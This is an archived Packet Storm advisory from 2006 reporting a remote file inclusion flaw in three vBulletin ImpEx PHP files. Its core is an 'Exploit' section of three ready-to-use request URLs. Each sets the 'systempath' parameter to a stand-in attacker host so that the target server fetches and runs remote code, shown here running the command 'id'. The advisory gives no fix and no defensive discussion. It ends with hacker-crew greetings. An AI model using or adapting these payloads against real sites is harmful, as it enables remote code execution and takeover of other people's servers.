VBulletinImpEx.txt

2006-04-19T00:00:00
ID PACKETSTORM:45558
Type packetstorm
Reporter Dr.Jr7
Modified 2006-04-19T00:00:00

Description

                                        
                                            `  
Remote File Inclusion in VBulletin ImpEx   
  
Date :   
  
12 / 4 / 2006   
  
Software :   
  
VBulletin ImpEx   
  
version :   
  
VBulletin 3.5.1  
VBulletin 3.5.2  
VBulletin 3.5.4  
  
The bug reside in :   
  
ImpExModule.php  
ImpExController.php  
ImpExDisplay.php  
  
Exploit :   
  
(1)  
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id  
  
(2)  
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id  
  
(3)  
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id  
  
Discovery by :  
  
Dr.Jr7  
  
GreeTz :   
  
special greet to Qptan & Mr.SNAKE & trooq  
  
and to my all frinds in www.lezr.com/vb  
  
see u :}  
`